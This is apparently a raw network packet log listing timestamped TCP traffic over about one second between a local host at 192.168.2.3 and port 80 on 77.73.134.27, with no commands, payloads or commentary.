                                                                                    Feb 7, 2023 19:44:55.997539043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997545004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997566938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997575045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997597933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997617960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997627974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997644901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997658968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997688055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997695923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997714043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997741938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997769117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997772932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997796059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997797966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997826099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997843981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997843981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997854948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997880936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997884035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997905016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997915030 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997946024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.997963905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997963905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.997977018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998001099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998007059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998035908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998061895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998089075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998090982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998116970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998123884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998152971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998153925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998182058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998183012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998213053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998214006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998241901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998243093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998310089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998334885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998362064 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998388052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998413086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998439074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998466015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998488903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998492002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998522043 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998522997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998552084 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998552084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998583078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998583078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998609066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998613119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998645067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998670101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998709917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998734951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998763084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998780012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998794079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998816013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998836994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.998872995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998899937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998925924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998951912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.998981953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999005079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999011040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999037981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999039888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999063015 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999070883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999097109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999100924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999131918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999152899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999161959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999176979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999191046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999219894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999224901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999249935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999262094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999281883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999288082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999310017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999313116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999345064 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999372005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999397993 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999424934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999450922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999478102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999506950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999531984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999535084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999532938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999576092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999592066 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999605894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999619007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999635935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999651909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999667883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999680042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999696970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999705076 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999727964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999730110 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999757051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999758959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999792099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999818087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999844074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999871016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999897957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999901056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999927044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999931097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999955893 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:55.999957085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999986887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:55.999996901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000016928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000025034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000047922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000075102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000102043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000124931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000129938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000158072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000161886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000161886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000186920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000191927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000215054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000222921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000242949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000248909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000273943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000274897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000302076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000329971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000358105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000358105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000386000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000386953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000411034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000416994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000447035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000475883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000483036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000483036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000507116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000516891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000536919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000564098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000590086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000617027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000641108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000641108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000648022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000679016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000690937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000708103 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000720024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000737906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000742912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000767946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000768900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000799894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000802040 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000828028 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000828981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000861883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000890970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000917912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000943899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000971079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.000976086 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.000998974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001007080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001029015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001029968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001056910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001071930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001086950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001106977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001106977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001117945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001147032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001157999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001176119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001199007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001199007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001209974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001233101 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001241922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001271963 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001298904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001318932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001328945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001352072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001358986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001378059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001388073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001419067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001420975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001446962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001456022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001476049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001483917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001507044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001534939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001553059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001564026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001583099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001594067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001610041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001622915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001636028 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001655102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001661062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001686096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001688004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001713037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.001717091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001745939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.001807928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.017815113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.017857075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.017882109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.017910004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.017939091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.017945051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.017966986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.017997980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018007994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018007994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018027067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018038988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018059015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018084049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018088102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018105984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018116951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018121004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018146992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018157959 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018174887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018201113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018609047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018641949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018671989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018673897 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018698931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018718958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018735886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018753052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.018774033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.018812895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019053936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019084930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019112110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019124031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019140005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019145012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019171000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019176960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019192934 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019201040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019231081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019232035 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019256115 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019263983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019284964 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019294977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.019315004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.019350052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024121046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024188042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024214983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024240971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024267912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024283886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024295092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024323940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024332047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024353027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024365902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024382114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024396896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024411917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024416924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024441957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024445057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024462938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024471998 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024501085 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024502993 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024528980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024533987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024559975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024565935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024590015 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024596930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024617910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024626970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024658918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024660110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024686098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024693012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024709940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024724007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024751902 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024754047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024774075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024784088 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024812937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024813890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024838924 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.024844885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.024866104 CET4969880192.168.2.377.73.134.27
